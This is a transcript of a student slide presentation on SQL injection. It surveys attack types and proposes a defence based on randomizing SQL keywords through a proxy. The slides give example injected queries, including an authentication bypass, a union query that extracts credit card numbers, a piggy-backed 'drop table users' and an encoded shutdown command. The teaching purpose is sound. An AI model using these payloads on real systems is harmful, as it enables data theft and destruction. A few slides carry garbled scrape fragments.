Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.

Similar presentations


Presentation on theme: "Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science."— Presentation transcript:

1 Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science

2  Many of the Web applications employ database driven content on the Internet. yahoo, Amazon  The interactive nature of web applications that employ database services consist vulnerabilities to SQL injection attacks  Web applications receive user inputs via form fields and then transfer those inputs as database requests

3  Transaction may consist of user name, password and information that have large amounts of monetary value.  A national security and privacy matter, such as social security numbers in the U.S.  SQL injection attacks are widespread and Web applications are vulnerable to SQL Injection Attacks (SQLIAs).  over 300 Internet Web sites has shown that most of them could be vulnerable to SQLIAs- Study by Gartner Group  SQLIA Examples: Travelocity, FTD.com, and Guess Inc.

4  SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application  Data provided by the user is NOT validated and included in an SQL query in such a way that part of the user’s input is treated as SQL code.

5  Tautologies  Illegal/Logically Incorrect Queries  Union Query  Piggy-Backed Queries  Stored Procedures  Inference  Alternate Encodings

6  Attack Intent: Bypassing authentication, identifying injectable parameters, extracting data.  The general goal of a tautology-based attack is to inject code in one or more conditional statements so that they always evaluate to true.  An attacker exploits an injectable field that is used in a query’s WHERE conditional SELECT accounts FROM users WHERE login=’’ or 1=1 -- AND pass=’’ AND pin=

7  Attack Intent: Identifying injectable parameters, performing database finger-printing, extracting data.  Description: This attack lets an attacker gather important information about the type and structure of the back-end database of a Web application. SELECT accounts FROM users WHERE login=’’ AND pass=’’ AND pin= convert (int,(select top 1 name from sysobjects where xtype=’u’))

8  Attack Intent: Bypassing Authentication, extracting data.  Description: In union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query.  SELECT accounts FROM users WHERE login=’’ UNION SELECT cardNo from CreditCards where acctNo=10032 -- AND pass=’’ AND pin=

9  Attack Intent: Extracting data, adding or modifying data, performing denial of service, executing remote commands.  Description: In this attack type, an attacker tries to inject additional queries into the original query. Vulnerability to this type of attack is often dependent on having a database configuration that allows multiple statements to be contained in a single string. SELECT accounts FROM users WHERE login=’doe’ AND pass=’’; drop table users -- ’ AND pin=123

10  Attack Intent: Performing privilege escalation, performing denial of service, executing remote commands.  Description: SQLIAs of this type try to execute stored procedures  An attacker determines which backend database is in use CREATE PROCEDURE DBO.isAuthenticated @userName varchar2, @pass varchar2, @pin int AS EXEC("SELECT accounts FROM users WHERE login=’" +@userName+ "’ and pass=’" +@password+ "’ and pin=" +@pin); GO

11  Attack Intent: Identifying injectable parameters, extracting data, determining database schema.  Description: The query is modified to recast it in the form of an action that is executed based on the answer to a true/false question about data values in the database.  Attackers are generally trying to attack a site that has been secured enough so that, when an injection has succeeded, there is no usable feedback via database error messages. SELECT accounts FROM users WHERE login=’legalUser’ and ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 -- ’ AND pass=’’ AND pin=0

12  Attack Intent: Evading detection.  Description: In this attack, the injected text is modified so as to avoid detection by defensive coding practices and also many automated prevention techniques. SELECT accounts FROM users WHERE login=’legalUser’; exec(char(0x73687574646f776e)) -- AND pass=’’ AND pin=tion with other attacks.

13 * Apply Instruction-set randomization to SQL * Creating instances of the language that are unpredictable to the attacker * Queries injected by the attacker will be caught by the database parser. * An intermediary proxy that translates the random SQL to its standard language. * Mechanism imposes negligible performance overhead to query processing and can be easily retrofitted to existing systems.

14

15 Mechanism provides a tool reads an SQL statement(s) and rewrites all keywords with the random key appended. select gender, avg(age) from cs101.students where dept = %d group by gender The utility will identify the six keywords in the example query and append the key to each one (e.g., when the key is “123”): select123 gender, avg123 (age) from123 cs101.students where123 dept = %d group123 by123 gender

16  Built proxy server that sits between the client (web server) and SQL server, de-randomizes requests received from the client, and conveys the query to the server.  If an SQL injection attack has occurred, the proxy’s parser will fail to recognize the randomized  implementation focused on CGI scripts as the query generators, a similar approach applies when using JDBC query and will reject it.

17  THANK YOU


Download ppt "Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science."

Similar presentations


Ads by Google